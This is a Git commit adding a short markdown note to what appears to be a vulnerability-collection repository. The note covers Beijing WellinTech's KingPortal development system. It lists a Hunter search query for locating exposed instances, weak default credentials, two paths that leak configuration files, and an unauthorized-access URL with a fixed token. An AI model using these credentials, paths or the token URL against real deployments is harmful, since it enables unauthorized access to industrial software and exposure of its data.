Create 北京亚控科技KingPortal开发系统漏洞集合.md

This commit is contained in:
wy876 2024-05-01 13:44:05 +08:00 committed by GitHub
parent af9af82d54
commit 55f9a4ac54
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -0,0 +1,28 @@
## 北京亚控科技KingPortal开发系统漏洞集合
## Hunter
```
web.title="KingPortal"
```
## 弱口令
```
admin001/admin001
admin001/kf_admin
```
## 信息泄露
```
/ProjectManager.json
/config/externalConfig.json
```
## KingPortal开发系统未授权访问
```
http://域名:11002/views/ProjectDataSourceAccess.html?token=2ccdf191078bd4e8e85b526ec44f7dd31ad7cf81&refreshToken=null
```
## 漏洞来源
- https://mp.weixin.qq.com/s/fYnLnoeHvYFwaSSKfBjQZw